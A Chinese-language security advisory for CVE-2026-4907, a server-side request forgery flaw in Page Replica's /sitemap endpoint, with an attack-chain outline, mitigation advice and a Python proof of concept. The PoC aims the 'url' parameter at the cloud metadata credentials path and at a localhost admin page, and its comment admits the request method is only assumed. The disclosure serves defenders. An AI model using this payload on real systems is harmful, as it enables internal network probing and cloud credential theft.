CVE-2026-4907 Page Replica服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-4907

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Page-Replica Page Replica

漏洞概述

Page-Replica Page Replica组件在处理/sitemap端点的sitemap.fetch函数时存在严重的安全漏洞。该漏洞源于对参数url的验证不足，导致了服务器端请求伪造（SSRF）。由于攻击可远程进行且已有公开的利用代码，风险显著。受影响产品采用滚动发布策略，具体版本难以界定，且供应商未对披露做出回应，建议用户立即关注并采取防护措施。

技术细节

该漏洞根源在于Page-Replica Page Replica项目中/sitemap端点的sitemap.fetch函数，未能对用户传入的“url”参数实施严格的格式校验与来源限制。应用程序在未经过滤的情况下，直接利用该用户可控的URL参数发起服务器端HTTP请求。这种实现缺陷使得攻击者能够构造包含内网IP地址（如127.0.0.1、192.168.x.x）或云元数据服务地址（如169.254.169.254）的恶意请求。成功利用此漏洞，攻击者不仅能绕过网络边界防护，探测内网拓扑结构，还可能结合其他漏洞对内部服务进行攻击，或窃取云平台凭证等敏感信息。鉴于该产品采取滚动发布模式，受影响版本延续至Git提交e4a7f52e，且攻击门槛低（仅需低权限），目前已有公开PoC，安全风险亟待处理。

攻击链分析

STEP 1

1. 侦察与访问

攻击者获取目标系统低权限账户访问权限，并确认目标运行了受影响版本的Page-Replica Page Replica。

STEP 2

2. 构造恶意请求

攻击者向/sitemap端点发送请求，在参数url中填入内网敏感地址（如127.0.0.1或元数据服务地址）。

STEP 3

3. 服务端请求伪造

服务器端接收请求后，未对url进行校验，直接向攻击者指定的内网地址发起HTTP请求。

STEP 4

4. 信息泄露与利用

攻击者根据服务器返回的响应内容，获取内网服务信息、敏感配置或云服务凭证，为进一步渗透做准备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-4907: SSRF in Page-Replica Page Replica
# Target the /sitemap endpoint with a malicious URL

target = "http://target-domain.com/sitemap"

# Example payload targeting internal metadata service (AWS)
# Change the payload to target internal network resources based on environment
malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Example payload targeting localhost
# malicious_url = "http://127.0.0.1:8080/admin"

payload = {
    "url": malicious_url
}

try:
    print(f"Sending request to {target} with payload: {payload}")
    # Assuming the endpoint accepts POST requests based on typical fetch implementations
    response = requests.post(target, data=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request successful! Potential SSRF confirmed.")
        print("Response content:")
        print(response.text[:500]) # Print first 500 chars to avoid flooding console
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

Page-Replica Page Replica <= commit e4a7f52e75093ee318b4d5a9a9db6751050d2ad0

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界设备（如WAF或防火墙）上部署规则，拦截针对/sitemap端点的可疑请求，特别是包含内网IP地址或非白名单域名的URL参数。同时，严格限制服务器的出站连接权限，仅允许必要的通信，以防止SSRF攻击被利用于探测内网或窃取云服务凭证。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4907
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4907
3 Details https://www.cvedetails.com/cve/CVE-2026-4907/
4 VulDB https://vuldb.com/cve/CVE-2026-4907
5 Link https://github.com/lakshayyverma/CVE-Discovery/blob/main/page_replica.md
6 Link https://vuldb.com/?ctiid.353658
7 Link https://vuldb.com/?id.353658
8 Link https://vuldb.com/?submit.777447